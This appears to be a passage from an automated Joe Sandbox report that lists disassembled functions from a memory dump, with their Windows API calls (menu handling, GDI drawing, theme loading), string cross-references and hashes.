SendMessageA.USER32(?,00001005,00000000,00000004), ref: 00C1E96D
CreatePopupMenu.USER32 ref: 00C1E9FC
TrackPopupMenu.USER32(?,00000102,?,?,00000000,?,00000000), ref: 00C1EA41
GetMenuDefaultItem.USER32(?,00000000,00000000), ref: 00C1EA5D
GetParent.USER32(?), ref: 00C1EAAD
GetParent.USER32(?), ref: 00C1EAEA
GetParent.USER32(?), ref: 00C1EAFD
SendMessageA.USER32(?,?,00000000,00000000), ref: 00C1EB16

Strings

$, xrefs: 00C1EAA3

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MessageSend$MenuParent$ClientPopupScreen$CreateDefaultException@8H_prolog3ItemThrowTrack_memset
String ID: $
API String ID: 3041658061-3993045852
Opcode ID: ea17c97ed76a8f7fef541493bfd7e7cb720d5d04c5a4e1ed575b1d07b15b39b6
Instruction ID: 8c16ffd0b01489eadd15c210d234c29e14e23f4595f29270d2ff7bb368fda23c
Opcode Fuzzy Hash: ea17c97ed76a8f7fef541493bfd7e7cb720d5d04c5a4e1ed575b1d07b15b39b6
Instruction Fuzzy Hash: 14C1E6B1A00209AFDB10DFA4D884EEEBBB9FF49304F104569F956E7260D771A981DF60

Function 00C305BF Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 263windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C305C9
CreateCompatibleDC.GDI32(00000000), ref: 00C305FE
GetObjectA.GDI32(?,00000018,?), ref: 00C3061F
SelectObject.GDI32(?,?), ref: 00C30671
CreateCompatibleDC.GDI32(?), ref: 00C3069E
CreateDIBSection.GDI32(?,?,00000000,?,00000000,00000000), ref: 00C30706
SelectObject.GDI32(?,?), ref: 00C30722
SelectObject.GDI32(?,00000000), ref: 00C3073F
SelectObject.GDI32(?,?), ref: 00C30757
DeleteObject.GDI32(?), ref: 00C3075F
BitBlt.GDI32(?,00000000,00000000,?,000000FF,?,00000000,00000000,00CC0020), ref: 00C30788
GetObjectA.GDI32(?,00000054,?), ref: 00C307BE
SelectObject.GDI32(?,?), ref: 00C309B3
SelectObject.GDI32(?,?), ref: 00C309C1
DeleteObject.GDI32(?), ref: 00C309C9

Strings

(, xrefs: 00C306E3
, xrefs: 00C307CC

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Object$Select$Create$CompatibleDelete$H_prolog3_Section
String ID: $(
API String ID: 339215182-55695022
Opcode ID: f75c4e7668dff0a918aafd36258cc7aca039c33710727b3d181b59acb1dc3dac
Instruction ID: 2040c5176725023538a069d56815062d81c76a1d116d63fc510c5ab8ed9da99f
Opcode Fuzzy Hash: f75c4e7668dff0a918aafd36258cc7aca039c33710727b3d181b59acb1dc3dac
Instruction Fuzzy Hash: 91C15A71900268DFDB24DF64CD95BEDBBB5EF49300F1080EAE58DA6252DB305A88DF61

Function 00C1CAF1 Relevance: 28.9, APIs: 19, Instructions: 446windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C1CAFB
IsWindow.USER32(?), ref: 00C1CB9D
GetMenuItemCount.USER32(00000001), ref: 00C1CCFB
AppendMenuA.USER32(00000001,00000800,00000000,00000000), ref: 00C1CD11
AppendMenuA.USER32(00000001,00000000,00000000,00000000), ref: 00C1CD2C
SendMessageA.USER32(?,0000040C,00000000,00000000), ref: 00C1CDA2
SendMessageA.USER32(?,0000041D,00000000,?), ref: 00C1CDDF
GetMenuItemCount.USER32(00000001), ref: 00C1CE35
AppendMenuA.USER32(00000001,00000800,00000000,00000000), ref: 00C1CE4B
AppendMenuA.USER32(00000001,00000000,00000000,?), ref: 00C1CE6C
GetMenuItemCount.USER32(00000001), ref: 00C1CED3
AppendMenuA.USER32(00000001,00000800,00000000,00000000), ref: 00C1CEE9
AppendMenuA.USER32(00000001,00000000,00000000,?), ref: 00C1CF0A
AppendMenuA.USER32(00000002,00000000,00000000,?), ref: 00C1CFF2
GetWindow.USER32(?,00000005), ref: 00C1D023
AppendMenuA.USER32(00000003,00000000,00000000,?), ref: 00C1D0A9
GetMenuItemCount.USER32(00000000), ref: 00C1D0EE
AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00C1D104
AppendMenuA.USER32(00000000,00000000,00000000,?), ref: 00C1D119

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Menu$Append$CountItem$MessageSendWindow$H_prolog3_
String ID:
API String ID: 2495817426-0
Opcode ID: a381705e3a211a6ef48abb71c48f02b4001f7071b3a85d8ae42472fa28153e68
Instruction ID: 18005cb42e83216ea3ff2182f83972c3843c3706fd02824e5b9ffec9df053189
Opcode Fuzzy Hash: a381705e3a211a6ef48abb71c48f02b4001f7071b3a85d8ae42472fa28153e68
Instruction Fuzzy Hash: 4C024F30A442159FEF249FA5CC95BADB7B5BF05300F1040A9F51AAB292DF709E85EF11

Function 00C71ABB Relevance: 28.6, APIs: 19, Instructions: 147windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00C71AD1
GetSystemMenu.USER32(?,00000000,?,00000000,?,?,?,00C72191,?), ref: 00C71AF0
SetMenuDefaultItem.USER32(?,0000F060,00000000,00000000,?,?,?,00C72191,?), ref: 00C71B19
GetParent.USER32(?), ref: 00C71B22
IsZoomed.USER32(?), ref: 00C71B2D
EnableMenuItem.USER32(?,0000F000,00000003), ref: 00C71B47
EnableMenuItem.USER32(?,0000F010,00000003), ref: 00C71B53
EnableMenuItem.USER32(?,0000F030,00000003), ref: 00C71B5F

Part of subcall function 00BE0271: GetParent.USER32(?), ref: 00BE027B

EnableMenuItem.USER32(?,0000F120,00000003), ref: 00C71B72
EnableMenuItem.USER32(?,0000F000,00000000), ref: 00C71B7E
EnableMenuItem.USER32(?,0000F010,00000000), ref: 00C71B8A
EnableMenuItem.USER32(?,0000F030,00000000), ref: 00C71B96
GetParent.USER32(?), ref: 00C71B9E
DeleteMenu.USER32(?,0000F120,00000000,00000000,?,?,?,00C72191,?), ref: 00C71BC4
DeleteMenu.USER32(?,0000F030,00000000,?,?,?,00C72191,?), ref: 00C71BD0
GetParent.USER32(?), ref: 00C71BD8
DeleteMenu.USER32(?,0000F020,00000000,00000000,?,?,?,00C72191,?), ref: 00C71BF8
GetParent.USER32(?), ref: 00C71C0A
TrackPopupMenu.USER32(?,00000004,00C72191,6AFFFFFF,00000000,?,00000000), ref: 00C71C55

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Menu$Item$Enable$Parent$Delete$DefaultPopupSystemTrackZoomed
String ID:
API String ID: 4239930045-0
Opcode ID: e0f49228e78a10148402d5c844cc31ce4239d4c6b3550214c729bbc702afde7b
Instruction ID: cafd28be4b1bf2d5d5f74ac8d1e68ea531e341adce89f4fd59f061260f58408f
Opcode Fuzzy Hash: e0f49228e78a10148402d5c844cc31ce4239d4c6b3550214c729bbc702afde7b
Instruction Fuzzy Hash: ED418C31240705BFEB31ABA5CD46F1ABBA9FF88B00F154464F619AB5A1DB70FD10AB14

Function 00C302DF Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 237windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C302E9
CreateCompatibleDC.GDI32(00000000), ref: 00C30350
GetObjectA.GDI32(?,00000018,000000FF), ref: 00C3036E
SelectObject.GDI32(?,?), ref: 00C303AC
CreateCompatibleDC.GDI32(?), ref: 00C303CA
CreateDIBSection.GDI32(?,?,00000000,?,00000000,00000000), ref: 00C30420
SelectObject.GDI32(?,?), ref: 00C30435
SelectObject.GDI32(?,00000000), ref: 00C3044B
SelectObject.GDI32(?,?), ref: 00C3045A
DeleteObject.GDI32(?), ref: 00C30461
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00C304B3
GetPixel.GDI32(?,?,00000000), ref: 00C3057B
SetPixel.GDI32(?,?,00000000,?), ref: 00C30590
SelectObject.GDI32(?,?), ref: 00C305AD
SelectObject.GDI32(?,?), ref: 00C305B5

Strings

(, xrefs: 00C30400

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Object$Select$Create$CompatiblePixel$DeleteH_prolog3_Section
String ID: (
API String ID: 1942225872-3887548279
Opcode ID: a8f7c34f2822c06407f3ef91c35d5302a7d65e8c70594711b06e06ed4e2ff352
Instruction ID: c47121458bb8b8b85d522d94b54b12b709a8db5a1d28758fc46a8e0146eb5b92
Opcode Fuzzy Hash: a8f7c34f2822c06407f3ef91c35d5302a7d65e8c70594711b06e06ed4e2ff352
Instruction Fuzzy Hash: F9A1F272C00218DFCF25EFA5CD91AADBBB5FF08311F20416AE526A7261DB306A46DF51

Function 00BE6630 Relevance: 28.1, APIs: 7, Strings: 9, Instructions: 72libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00BDD876: ActivateActCtx.KERNEL32(?,?,00D1ACE0,00000010,00BE03BD,hhctrl.ocx,00BDF5EF,0000000C), ref: 00BDD896

GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 00BE665A
GetProcAddress.KERNEL32(75300000,DrawThemeTextEx), ref: 00BE666D
GetProcAddress.KERNEL32(75300000,BeginBufferedPaint), ref: 00BE6680
GetProcAddress.KERNEL32(75300000,EndBufferedPaint), ref: 00BE6693
GetProcAddress.KERNEL32(00000000,DwmExtendFrameIntoClientArea), ref: 00BE66DD
GetProcAddress.KERNEL32(74100000,DwmDefWindowProc), ref: 00BE66F0
GetProcAddress.KERNEL32(74100000,DwmIsCompositionEnabled), ref: 00BE6703

Strings

DwmExtendFrameIntoClientArea, xrefs: 00BE66D7
DrawThemeParentBackground, xrefs: 00BE6654
EndBufferedPaint, xrefs: 00BE6682
dwmapi.dll, xrefs: 00BE66BD
DwmIsCompositionEnabled, xrefs: 00BE66F2
DwmDefWindowProc, xrefs: 00BE66DF
BeginBufferedPaint, xrefs: 00BE666F
UxTheme.dll, xrefs: 00BE6635
DrawThemeTextEx, xrefs: 00BE665C

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: AddressProc$Activate
String ID: BeginBufferedPaint$DrawThemeParentBackground$DrawThemeTextEx$DwmDefWindowProc$DwmExtendFrameIntoClientArea$DwmIsCompositionEnabled$EndBufferedPaint$UxTheme.dll$dwmapi.dll
API String ID: 2388279185-3875329446
Opcode ID: d76cac79df5a510b0aadcce556972e01757a9540112828e1f6df14f0b7e3ff44
Instruction ID: 1db70c6ca1ccbfa187060c2334c2c678f4a3085594c3c7aba876e62fc998a12c
Opcode Fuzzy Hash: d76cac79df5a510b0aadcce556972e01757a9540112828e1f6df14f0b7e3ff44
Instruction Fuzzy Hash: 8C216DB1980B829FC7216F728C89EDBFFE4EF44744F114C7EE4AA93251DB7064018A80

Function 00C0E192 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 73libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00BDD876: ActivateActCtx.KERNEL32(?,?,00D1ACE0,00000010,00BE03BD,hhctrl.ocx,00BDF5EF,0000000C), ref: 00BDD896

GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 00C0E1F4
GetProcAddress.KERNEL32(?,CloseThemeData), ref: 00C0E201
GetProcAddress.KERNEL32(?,DrawThemeBackground), ref: 00C0E20E
GetProcAddress.KERNEL32(?,GetThemeColor), ref: 00C0E21B
GetProcAddress.KERNEL32(?,GetThemeSysColor), ref: 00C0E228
GetProcAddress.KERNEL32(?,GetCurrentThemeName), ref: 00C0E235
GetProcAddress.KERNEL32(?,GetWindowTheme), ref: 00C0E242

Strings

CloseThemeData, xrefs: 00C0E1F6
GetThemeSysColor, xrefs: 00C0E21D
OpenThemeData, xrefs: 00C0E1EE
GetCurrentThemeName, xrefs: 00C0E22A
GetWindowTheme, xrefs: 00C0E237
GetThemeColor, xrefs: 00C0E210
UxTheme.dll, xrefs: 00C0E19A
DrawThemeBackground, xrefs: 00C0E203

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: AddressProc$Activate
String ID: CloseThemeData$DrawThemeBackground$GetCurrentThemeName$GetThemeColor$GetThemeSysColor$GetWindowTheme$OpenThemeData$UxTheme.dll
API String ID: 2388279185-1975976892
Opcode ID: d6e65c609b552fe1ec26600b659bf0560463be281b23b17f0d2c244d8e441bcd
Instruction ID: 6cc9e7057f38e55f2f22e391a713e6cb4fb1e76c4ef85095de36febb15c8e26b
Opcode Fuzzy Hash: d6e65c609b552fe1ec26600b659bf0560463be281b23b17f0d2c244d8e441bcd
Instruction Fuzzy Hash: 8C3149B0941B949FC7709F6B8945817FBF8BFA4B143118D2FE59683A60D7B5A440CF41

Function 00C1622C Relevance: 25.8, APIs: 17, Instructions: 271windowCOMMON

Download Yara Rule

APIs

InflateRect.USER32(?,00000004,00000004), ref: 00C16289
InvalidateRect.USER32(?,?,00000001), ref: 00C1629B
UpdateWindow.USER32(?), ref: 00C162A4
GetMessageA.USER32(?,00000000,0000000F,0000000F), ref: 00C162E3
DispatchMessageA.USER32(?), ref: 00C162F1
PeekMessageA.USER32(?,00000000,0000000F,0000000F,00000000), ref: 00C162FF
GetCapture.USER32 ref: 00C1630B
SetCapture.USER32(?), ref: 00C16317
GetCapture.USER32 ref: 00C16323
GetWindowRect.USER32(?,?), ref: 00C1634D
SetCursorPos.USER32(?,?), ref: 00C16370
GetCapture.USER32 ref: 00C16376
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00C1638E
DispatchMessageA.USER32(?), ref: 00C163B4
ReleaseCapture.USER32 ref: 00C163F2
IsWindow.USER32(?), ref: 00C163FB
SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00C16414

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Message$Capture$RectWindow$Dispatch$CursorInflateInvalidatePeekReleaseSendUpdate
String ID:
API String ID: 4077352625-0
Opcode ID: e11feabad29f56439721c8c7121a4d68409b0965b59959e4aca59d0981e79a1e
Instruction ID: 8b40fedf148285f5adf587a7880e5ff635cd2033cbe44594c5a2d291beac2bb3
Opcode Fuzzy Hash: e11feabad29f56439721c8c7121a4d68409b0965b59959e4aca59d0981e79a1e
Instruction Fuzzy Hash: 0E917071A00159AFCB14EFA5DDC8EEDBBB9FB45310B14416AF511A7260DB30AE80EB51

Function 00C967FB Relevance: 24.4, APIs: 16, Instructions: 368COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C96802
GetCursorPos.USER32(?), ref: 00C968B4
IsRectEmpty.USER32(00000000), ref: 00C968E8
IsRectEmpty.USER32(?), ref: 00C9690E
IsRectEmpty.USER32(00000000), ref: 00C9692A
GetWindowRect.USER32(?,00000000), ref: 00C96950
GetWindowRect.USER32(?,00000000), ref: 00C96984
PtInRect.USER32(00000000,?,00000000), ref: 00C969C4
OffsetRect.USER32(00000000,?,00000000), ref: 00C969DC

Part of subcall function 00C7539B: __EH_prolog3.LIBCMT ref: 00C753A2
Part of subcall function 00C7539B: SetRectEmpty.USER32(?), ref: 00C754A9
Part of subcall function 00C7539B: SetRectEmpty.USER32(?), ref: 00C754B2

SetRectEmpty.USER32(?), ref: 00C96A07
OffsetRect.USER32(00000000,?,?), ref: 00C96B66
IsRectEmpty.USER32(?), ref: 00C96B8B
IsRectEmpty.USER32(?), ref: 00C96BB0
PtInRect.USER32(00000000,?,?), ref: 00C96BC0
OffsetRect.USER32(00000000,?,?), ref: 00C96BE9
IsRectEmpty.USER32(?), ref: 00C96C00

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$Empty$Offset$Window$CursorH_prolog3H_prolog3_
String ID:
API String ID: 359163869-0
Opcode ID: cf3d099d3c1b00cf5861b99f9d851dcd7871fa9cdab736ca0100033bbf616115
Instruction ID: 6e3902e0c97e61d73613eb622713e884834438bede3ebac2443dc73e84d9c88b
Opcode Fuzzy Hash: cf3d099d3c1b00cf5861b99f9d851dcd7871fa9cdab736ca0100033bbf616115
Instruction Fuzzy Hash: 2AE14A719002149FCF15DFA4C988AAEBBF9FF08700F144169E915EB299EB31EE45DB90

Function 00BEAB06 Relevance: 24.2, APIs: 16, Instructions: 245windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BEAB0D
CreateRectRgnIndirect.GDI32(?), ref: 00BEAB4A
CopyRect.USER32(?,?), ref: 00BEAB60
InflateRect.USER32(?,?,?), ref: 00BEAB76
IntersectRect.USER32(?,?,?), ref: 00BEAB84
CreateRectRgnIndirect.GDI32(?), ref: 00BEAB8E
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00BEABA3

Part of subcall function 00BEA939: CombineRgn.GDI32(?,?,?,?), ref: 00BEA95E

CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00BEAC0B
SetRectRgn.GDI32(?,0000000A,?,?,?), ref: 00BEAC28
CopyRect.USER32(?,0000000A), ref: 00BEAC33
InflateRect.USER32(?,?,?), ref: 00BEAC49
IntersectRect.USER32(?,?,0000000A), ref: 00BEAC55
SetRectRgn.GDI32(?,?,?,?,0000000A), ref: 00BEAC6A
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00BEAC96

Part of subcall function 00BEA968: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 00BEA9B1
Part of subcall function 00BEA968: CreatePatternBrush.GDI32(00000000), ref: 00BEA9BE
Part of subcall function 00BEA968: DeleteObject.GDI32(00000000), ref: 00BEA9CA

Part of subcall function 00BD8606: SelectObject.GDI32(?,00000000), ref: 00BD862C
Part of subcall function 00BD8606: SelectObject.GDI32(?,?), ref: 00BD8642

PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 00BEAD07
PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 00BEAD5C

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$Create$Object$CopyIndirectInflateIntersectSelect$BitmapBrushCombineDeleteH_prolog3_Pattern
String ID:
API String ID: 3107162742-0
Opcode ID: a526c61150247cc804a8d69f8170525c8b7135e4355159fe9170374166af2ffe
Instruction ID: f6dfe4d9b67c66be2cfa6350b05b7df0c50522d2bacc2ebde5d44c4f4fb7be25
Opcode Fuzzy Hash: a526c61150247cc804a8d69f8170525c8b7135e4355159fe9170374166af2ffe
Instruction Fuzzy Hash: 5CA1E1B1900259AFCF05EFE4DD95EEEBBB9FF48301F14405AF506A6251DB34AA05CB21

Function 00BE2B30 Relevance: 24.2, APIs: 16, Instructions: 182windowCOMMON

Download Yara Rule

APIs

PeekMessageA.USER32(?,00000000,00000201,00000201,00000001), ref: 00BE2BC9
SendMessageA.USER32(00000000,00000084,00000000,?), ref: 00BE2BE6
ReleaseCapture.USER32 ref: 00BE2C21
GetMessageA.USER32(?,00000000,000000A1,000000A1), ref: 00BE2C30
PeekMessageA.USER32(?,00000000,?,?,00000001), ref: 00BE2C44
DispatchMessageA.USER32(?), ref: 00BE2C4B
DispatchMessageA.USER32(?), ref: 00BE2CF6
GetCursorPos.USER32(?), ref: 00BE2D00
PeekMessageA.USER32(?,00000000,?,?,00000001), ref: 00BE2D21

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Message$Peek$Dispatch$CaptureCursorReleaseSend
String ID:
API String ID: 597789953-0
Opcode ID: bc9c8e07715fa5367b8055e76be2278cb3e13bfa8c1db5a82fa598df3e894a19
Instruction ID: 6dadb73ed34b48fff906a5311e061a73c83c381d5e6d39a6d65263984cd78e99
Opcode Fuzzy Hash: bc9c8e07715fa5367b8055e76be2278cb3e13bfa8c1db5a82fa598df3e894a19
Instruction Fuzzy Hash: C6519D71600684BFEB209F66CC88FAF7BFCEB49700F244495F902D6250D774A9809766

Function 00C300F8 Relevance: 24.2, APIs: 16, Instructions: 157windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C300FF
CreateCompatibleDC.GDI32(00000000), ref: 00C30135
GetObjectA.GDI32(?,00000018,?), ref: 00C3014C
SelectObject.GDI32(?,?), ref: 00C30178
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00C3019A
SelectObject.GDI32(?,00000000), ref: 00C301AD
CreateCompatibleDC.GDI32(?), ref: 00C301C0
SelectObject.GDI32(?,?), ref: 00C301D1
SelectObject.GDI32(?,00000000), ref: 00C301E2
DeleteObject.GDI32(?), ref: 00C301E7
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00C30213
GetPixel.GDI32(?,?,?), ref: 00C30232
SetPixel.GDI32(?,?,?,00000000), ref: 00C30279
SelectObject.GDI32(?,?), ref: 00C3029D
SelectObject.GDI32(?,00000000), ref: 00C302A5
DeleteObject.GDI32(?), ref: 00C302AD

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Object$Select$CompatibleCreate$DeletePixel$BitmapH_prolog3
String ID:
API String ID: 3639146769-0
Opcode ID: 20bd2e85e2de4bf244a7361e41369c451b7007451ad2169f7695b3074f814ee4
Instruction ID: f5b0490498d8c4aa89ef42819cda5ff4efe314dd1e0f9e7f79abff66e5772190
Opcode Fuzzy Hash: 20bd2e85e2de4bf244a7361e41369c451b7007451ad2169f7695b3074f814ee4
Instruction Fuzzy Hash: 53511732810109EFCF12EFA0CD59AEEBBB6FF04311F204129E425B61A1DB315A56EF61

